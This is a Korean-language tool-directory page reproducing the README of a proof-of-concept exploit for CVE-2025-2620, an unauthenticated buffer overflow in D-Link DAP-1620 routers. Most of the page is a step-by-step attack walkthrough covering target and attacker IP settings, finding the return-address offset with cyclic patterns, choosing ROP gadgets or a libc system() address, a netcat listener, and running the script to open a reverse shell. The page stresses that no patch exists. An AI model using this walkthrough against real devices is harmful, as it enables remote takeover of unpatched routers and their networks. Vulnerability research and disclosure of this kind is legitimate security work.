Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-2620-poc — CVE-2025-2620에 대한 개념 증명 익스플로잇, D-Link DAP-1620 라우터의 심각한 스택 기반 버퍼 오버플로우로 인증되지 않은 원격 코드 실행 및 리버스 셸 접근을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/otsmane-ahmed/cve-2025-2620-poc
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration TestingRed TeamingRemote Access ToolPayload DevelopmentBinary Exploitation
16161년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
otsmane-ahmed/cve-2025-2620-poc

CVE-2025-2620-poc

CVE-2025-2620에 대한 개념 증명 익스플로잇, D-Link DAP-1620 라우터의 심각한 스택 기반 버퍼 오버플로우로 인증되지 않은 원격 코드 실행 및 리버스 셸 접근을 가능하게 합니다.

저장소 보기

CVE-2025-2620 개념 증명 익스플로잇

개요

이 저장소는 D-Link DAP-1620 라우터의 펌웨어 버전 1.03에서 발견된 치명적인 스택 기반 버퍼 오버플로 취약점인 CVE-2025-2620에 대한 고급 개념 증명(PoC) 익스플로잇을 포함하고 있습니다. 이 취약점은 인증되지 않은 원격 공격자가 라우터의 웹 서버를 충돌시키거나(서비스 거부, DoS) 잠재적으로 임의 코드를 실행할 수 있게 합니다(원격 코드 실행, RCE).

이 프로젝트의 목적은 익스플로잇 개발 기술을 시연하는 것입니다.

취약점 세부 정보

CVE 설명

CVE-2025-2620은 D-Link DAP-1620 라우터의 mod_graph_auth_uri_handler 함수, 특히 /storage 엔드포인트에 영향을 미칩니다. 이 취약점은 부적절한 경계 검사로 인해 발생하며, 공격자가 할당된 버퍼 크기를 초과하는 큰 입력을 보내 스택 기반 버퍼 오버플로를 유발할 수 있습니다.

영향

  • 서비스 거부(DoS): 라우터의 HTTP 서버를 충돌시켜 재부팅할 때까지 응답하지 않게 만듭니다.
  • 원격 코드 실행(RCE): 공격자는 반환 주소를 덮어쓰고 라우터의 MIPS 기반 아키텍처에서 임의 코드를 실행할 수 있습니다.
  • 인증 불필요: 이 취약점은 자격 증명 없이 원격으로 트리거될 수 있어 심각성이 증가합니다.

기술적 분석

취약한 함수는 HTTP 요청에서 인증 매개변수(auth)를 처리합니다:

root@kitploit:~
void mod_graph_auth_uri_handler(char *input) {
    char buffer[512];  // 고정 크기 스택 버퍼
    strcpy(buffer, input);  // 길이 검사 없음, 오버플로 발생
    // 인증 처리...
}

과도한 크기의 페이로드(예: 1024+ 바이트)를 보내는 공격자는 인접 메모리를 덮어쓰며, 여기에는 함수의 반환 주소도 포함되어 코드 실행으로 이어질 수 있습니다.

CVSS v3.1 점수: 9.8 (심각)

영향을 받는 장치

D-Link DAP-1620는 다음과 같은 사양을 가진 Wi-Fi 범위 확장기입니다:

  • CPU: Realtek RTL8197F (MIPS 24Kc, ~600 MHz)
  • RAM: 64 MB
  • 플래시: 16 MB
  • Wi-Fi: 듀얼 밴드 802.11ac
  • 펌웨어: 1.03 (취약점 확인됨)

유사한 펌웨어를 사용하는 다른 D-Link 라우터/확장기도 영향을 받을 수 있습니다.

공개 타임라인

  • 2025년 3월 22일 – CVE-2025-2620이 NVD/MITRE에 게시됨.
  • 2025년 3월 22일 – 본 PoC 개발 및 테스트 완료.
  • 2025년 3월 22일 – 현재까지 D-Link의 공식 패치 없음.

PoC 익스플로잇 세부 정보

기능

통합 PoC – 버퍼 오버플로 테스트와 RCE 익스플로잇을 모두 포함.
스택 기반 버퍼 오버플로 테스트 – 취약한 라우터 식별.
완전한 원격 코드 실행(RCE) 익스플로잇 – 리버스 셸 생성.
구성 가능한 페이로드 크기 및 반환 주소 – 다른 라우터 모델에 적용 가능.
향상된 디버깅 – 충돌 오프셋을 로깅하여 익스플로잇 매개변수 정제.

설치 및 사용법

1단계: 저장소 클론

root@kitploit:~
git clone https://github.com/Otsmane-Ahmed/CVE-2025-2620-poc.git
cd CVE-2025-2620-poc

2단계: 종속성 설치

Python3와 pwntools가 설치되어 있는지 확인하세요:

root@kitploit:~
pip install pwntools

3단계: 익스플로잇 구성

CVE-2025-2620_poc.py 스크립트를 수정하세요:

라우터 IP 설정:

root@kitploit:~
TARGET_IP = "192.168.0.1"  # 라우터에 맞게 변경

공격자 머신 IP 설정:

root@kitploit:~
ATTACKER_IP = "192.168.0.100"  # 로컬 IP로 변경
ATTACKER_PORT = 4444  # 필요시 변경

필요시 버퍼 크기 조정:

root@kitploit:~
BUFFER_SIZE = 8000  # 라우터가 충돌하지 않으면 증가

EIP 오프셋 찾기 및 반환 주소 설정:

1단계: 순환 패턴 전송

PoC를 수정하여 고유 패턴을 생성하고 전송하세요:

root@kitploit:~
MODE = "overflow"  # 오프셋을 찾기 위해 "overflow"로 설정

스크립트 실행:

root@kitploit:~
python3 CVE-2025-2620_poc.py
2단계: 충돌 주소 확인

라우터가 충돌한 후, 다음에서 segfault 주소(x86의 경우 EIP, MIPS의 경우 RA)를 확인하세요:

  • 라우터 로그
  • 디버거(gdb)
  • dmesg | grep 'segfault'

0x61616161과 같은 주소를 찾으세요(이는 순환 패턴의 일부가 반환 포인터를 덮어썼음을 의미합니다).

3단계: 오프셋 찾기

cyclic_find를 사용하여 정확한 오프셋을 찾으세요:

root@kitploit:~
from pwn import cyclic_find
print(cyclic_find(0x61616161))  # 충돌 주소로 대체

이로부터 정확한 OFFSET 값을 얻을 수 있습니다. PoC를 업데이트하세요:

root@kitploit:~
OFFSET = <찾은 OFFSET>  # 실제 숫자로 대체
4단계: 적합한 반환 주소(RET_ADDR) 찾기
  • 옵션 1: JMP 또는 CALL 가젯 찾기

    root@kitploit:~
    ROPgadget --binary vulnerable_binary | grep "jmp"
    

    레지스터(예: jmp $sp 또는 jmp $ra)로 점프하는 주소를 선택하세요.

  • 옵션 2: ret2libc 주소 사용 libc에서 system()의 주소를 찾으세요:

    root@kitploit:~
    objdump -D /lib/libc.so.6 | grep "system"
    

    그런 다음 이를 RET_ADDR로 사용하세요:

    root@kitploit:~
    RET_ADDR = struct.pack("<I", 0xdeadbeef)  # 실제 주소로 대체
    

4단계: 리스너 시작

root@kitploit:~
nc -lvnp 4444

5단계: 익스플로잇 실행

root@kitploit:~
python3 CVE-2025-2620_poc.py --mode rce

Otsmane Ahmed가 ❤️를 담아 개발함

도구 다운로드
메트릭값
공격 경로네트워크
공격 복잡성낮음
필요 권한없음
사용자 상호작용없음
기밀성 영향높음
무결성 영향높음
가용성 영향높음